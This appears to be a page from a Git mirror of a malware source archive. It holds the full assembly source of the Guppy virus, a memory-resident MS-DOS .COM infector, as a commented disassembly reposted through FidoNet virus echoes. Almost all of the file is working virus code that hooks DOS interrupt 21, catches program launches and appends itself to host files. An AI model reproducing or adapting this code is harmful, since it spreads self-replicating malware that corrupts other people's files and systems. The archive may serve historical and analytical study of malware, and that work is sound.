ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
6332d7096f
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir30.asm
vxunderground c227f1121a
Add files via upload
2021-01-12 18:07:35 -06:00

192 lines
6.3 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 20 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : GUPPY.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:39)
;* To : Brad Frazee
;* Subj : GUPPY.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
;***************************************************************************
;* The Guppy Virus *
;* Disassembly by Black Wolf *
;***************************************************************************
;* The Guppy virus is a relatively simple, very small, resident .COM *
;*infector. It uses the standard way for a regular program to go resident *
;*(i.e. Int 27) which makes the infected program terminate the first time *
;*run. After that, however, infected files will run perfectly. This virus*
;*uses interesting methods to restore the storage bytes, as well as a *
;*strange technique to restore control to an infected file after it has *
;*already gone memory resident. *
;* *
;*Note: The Guppy virus was originally assembled with an assembler other *
;* than Tasm, so to keep it exactly the same some commands must be *
;* entered directly as individual bytes. In these cases, the command *
;* is commented out and the bytes are found below it. *
;* *
;***************************************************************************
.model tiny
.radix 16
.code
org 100h
start:
call Get_Offset
Get_Offset:
pop si ;SI = offset of vir +
;(Get_Offset-Start)
mov ax,3521h
mov bx,ax
int 21h ;Get Int 21 Address
mov ds:[si+Int_21_Offset-103],bx ;Save old Int 21
mov ds:[si+Int_21_Segment-103],es
;mov dx,si ;Bytes vary between assemblers
db 89,0f2
;add dx,offset Int_21_Handler-104
db 83,0c2,1f
mov ah,25h
int 21h ;Set Int 21
inc dh ;Add 100h bytes to go resident
;from handler
push cs
pop es
int 27h ;Terminate & stay resident
Int_21_Handler:
cmp ax,4B00h ;Is call a Load & Execute?
je Infect ;Yes? Jump Infect
cmp al,21h ;Might it be a residency check?
jne Go_Int_21 ;No? Restore control to Int 21
;cmp ax,bx ;Are AX and BX the same?
db 39,0d8
jne Go_Int_21 ;No, Restore control to Int 21
push word ptr [si+3dh] ;3dh = offset of Storage_Bytes -
;Get_Offset
;This gets the first word of
;storage bytes, which is then
;popped to CS:100 to restore it.
mov bx,offset ds:[100] ;100 = Beginning of COM
pop word ptr [bx]
mov cl,[si+3Fh] ;Restore third storage byte.
mov [bx+2],cl
Restore_Control:
pop cx
push bx
iret ;Jump back to Host program.
Storage_Bytes db 0, 0, 0
Infect:
push ax
push bx
push dx
push ds
mov ax,3D02h
int 21h ;Open File for Read/Write Access
xchg ax,bx
call Get_Offset_Two
Get_Offset_Two:
pop si
push cs
pop ds
mov ah,3F
mov cx,3
sub si,10 ;Set SI=Storage_Bytes
;mov dx,si
db 89,0f2
int 21h ;Read first 3 bytes of file
cmp byte ptr [si],0E9h ;Is the first command a jump?
jne Close_File ;No? Jump to Close_File
mov ax,4202h
xor dx,dx
xor cx,cx
int 21h ;Go to end of file
xchg ax,di
mov ah,40h
mov cl,98h ;Virus Size
;mov dx,si
db 89,0f2
sub dx,40h ;Beginning of virus
int 21h ;Append virus to new host
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h ;Go back to beginning of file
mov cl,3
;sub di,cx
db 29,0cf
mov [si+1],di
mov ah,40h
;mov dx,si
db 89,0f2
int 21h ;Write 3 byte jump to file
Close_File:
mov ah,3Eh
int 21h
pop ds
pop dx
pop bx
pop ax
Go_Int_21:
db 0EAh ;Go On With Int 21
Int_21_Offset dw ?
Int_21_Segment dw ?
end start
;-+- UC2 Support France
; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/d Warn if duplicate symbols in libraries
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
Reference in New Issue View Git Blame Copy Permalink